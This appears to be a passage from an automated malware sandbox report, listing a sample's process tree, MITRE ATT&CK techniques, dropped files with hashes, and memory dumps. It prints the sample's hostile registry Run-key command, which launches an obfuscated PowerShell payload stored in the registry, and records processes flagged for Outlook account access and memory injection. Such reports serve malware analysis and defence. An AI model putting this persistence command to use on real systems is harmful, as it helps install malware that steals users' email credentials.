    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Eichmanns" /t REG_EXPAND_SZ /d "%Medborger% -windowstyle 1 $Bolometers=(gp -Path 'HKCU:\Software\Clydes199\').Corsy;%Medborger% ($Bolometers)"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4892
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Eichmanns" /t REG_EXPAND_SZ /d "%Medborger% -windowstyle 1 $Bolometers=(gp -Path 'HKCU:\Software\Clydes199\').Corsy;%Medborger% ($Bolometers)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:4692
- - C:\Windows\SysWOW64\dxdiag.exe
    C:\Windows\System32\dxdiag.exe /stext "C:\Users\Admin\AppData\Local\Temp\xlithojmvgxrvrkpysiwgsljhbiizsca"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1408
- - C:\Windows\SysWOW64\dxdiag.exe
    C:\Windows\System32\dxdiag.exe /stext "C:\Users\Admin\AppData\Local\Temp\aooda"
    3⤵
    - Accesses Microsoft Outlook accounts
    - System Location Discovery: System Language Discovery
    PID:4432
- - C:\Windows\SysWOW64\dxdiag.exe
    C:\Windows\System32\dxdiag.exe /stext "C:\Users\Admin\AppData\Local\Temp\kitwbreh"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2788

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d4ff23c124ae23955d34ae2a7306099a

SHA1
b814e3331a09a27acfcd114d0c8fcb07957940a3

SHA256
1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

SHA512
f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_245nrsbf.zu2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\xlithojmvgxrvrkpysiwgsljhbiizsca

Filesize
4KB

MD5
17eece3240d08aa4811cf1007cfe2585

SHA1
6c10329f61455d1c96e041b6f89ee6260af3bd0f

SHA256
7cc0db44c7b23e4894fe11f0d8d84b2a82ad667eb1e3504192f3ba729f9a7903

SHA512
a7de8d6322410ec89f76c70a7159645e8913774f38b84aafeeeb9f90dc3b9aa74a0a280d0bb6674790c04a8ff2d059327f02ebfda6c4486778d53b7fc6da6370

Download Submit
C:\Users\Admin\AppData\Roaming\Borgerliggrelsen.Bol

Filesize
408KB

MD5
7e626a625c18607c9136c772498be376

SHA1
c7fd93707af388150ad36cb15c1099aa2699af95

SHA256
e05776733d27e0bc6b2703a8f63fcdc984c86629981fabb92cdf4a9cf341d52d

SHA512
d65f1775153f5cff6722a485a703f939475ce4f096240b253bd78e0a6ad885ab56ac1e4412f4a7d431fd59c13266b3717ab80721b903c7890930ab00f9aa9ffc

Download Submit
memory/772-49-0x0000000007FC0000-0x0000000008564000-memory.dmp

Filesize
5.6MB

Download
memory/772-25-0x0000000004770000-0x00000000047A6000-memory.dmp

Filesize
216KB

Download
memory/772-62-0x0000000074E30000-0x00000000755E0000-memory.dmp

Filesize
7.7MB

Download
memory/772-61-0x0000000074E30000-0x00000000755E0000-memory.dmp

Filesize
7.7MB

Download
memory/772-60-0x0000000074E30000-0x00000000755E0000-memory.dmp

Filesize
7.7MB

Download
memory/772-24-0x0000000074E3E000-0x0000000074E3F000-memory.dmp

Filesize
4KB

Download
memory/772-53-0x0000000074E30000-0x00000000755E0000-memory.dmp

Filesize
7.7MB

Download
memory/772-26-0x0000000074E30000-0x00000000755E0000-memory.dmp

Filesize
7.7MB

Download
memory/772-27-0x0000000074E30000-0x00000000755E0000-memory.dmp

Filesize
7.7MB

Download
memory/772-28-0x0000000004DE0000-0x0000000005408000-memory.dmp

Filesize
6.2MB

Download
memory/772-29-0x0000000004D40000-0x0000000004D62000-memory.dmp

Filesize
136KB

Download
memory/772-54-0x0000000074E3E000-0x0000000074E3F000-memory.dmp

Filesize
4KB

Download
memory/772-31-0x00000000054F0000-0x0000000005556000-memory.dmp

Filesize
408KB

Download
memory/772-37-0x00000000056E0000-0x0000000005A34000-memory.dmp

Filesize
3.3MB

Download
memory/772-59-0x0000000074E30000-0x00000000755E0000-memory.dmp

Filesize
7.7MB

Download
memory/772-43-0x0000000005D20000-0x0000000005D3E000-memory.dmp

Filesize
120KB

Download
memory/772-44-0x0000000006330000-0x000000000637C000-memory.dmp

Filesize
304KB

Download
memory/772-45-0x0000000007390000-0x0000000007A0A000-memory.dmp

Filesize
6.5MB

Download
memory/772-46-0x0000000006250000-0x000000000626A000-memory.dmp

Filesize
104KB

Download
memory/772-47-0x0000000006FD0000-0x0000000007066000-memory.dmp

Filesize
600KB

Download
memory/772-52-0x0000000074E30000-0x00000000755E0000-memory.dmp

Filesize
7.7MB

Download
memory/772-58-0x0000000074E30000-0x00000000755E0000-memory.dmp

Filesize
7.7MB

Download
memory/772-57-0x0000000008570000-0x000000000C5AC000-memory.dmp

Filesize
64.2MB

Download
memory/772-51-0x0000000074E30000-0x00000000755E0000-memory.dmp

Filesize
7.7MB

Download
memory/772-48-0x0000000006F60000-0x0000000006F82000-memory.dmp

Filesize
136KB

Download
memory/772-56-0x0000000074E30000-0x00000000755E0000-memory.dmp

Filesize
7.7MB

Download
memory/772-30-0x0000000005410000-0x0000000005476000-memory.dmp

Filesize
408KB

Download
memory/772-55-0x0000000074E30000-0x00000000755E0000-memory.dmp

Filesize
7.7MB

Download
memory/1408-75-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1408-73-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1408-72-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2788-81-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2788-82-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2788-83-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/3660-66-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/3660-90-0x00000000215A0000-0x00000000215B9000-memory.dmp

Filesize
100KB

Download
memory/3660-86-0x00000000215A0000-0x00000000215B9000-memory.dmp

Filesize
100KB

Download
memory/3660-89-0x00000000215A0000-0x00000000215B9000-memory.dmp

Filesize
100KB

Download
memory/4172-13-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp

Filesize
10.8MB

Download
memory/4172-15-0x00007FFA89BB3000-0x00007FFA89BB5000-memory.dmp

Filesize
8KB

Download
memory/4172-16-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp

Filesize
10.8MB

Download
memory/4172-20-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp

Filesize
10.8MB

Download
memory/4172-23-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp

Filesize
10.8MB

Download
memory/4172-8-0x0000027B32330000-0x0000027B32352000-memory.dmp

Filesize
136KB

Download
memory/4172-14-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp

Filesize
10.8MB

Download
memory/4172-2-0x00007FFA89BB3000-0x00007FFA89BB5000-memory.dmp

Filesize
8KB

Download
memory/4432-77-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/4432-74-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/4432-76-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download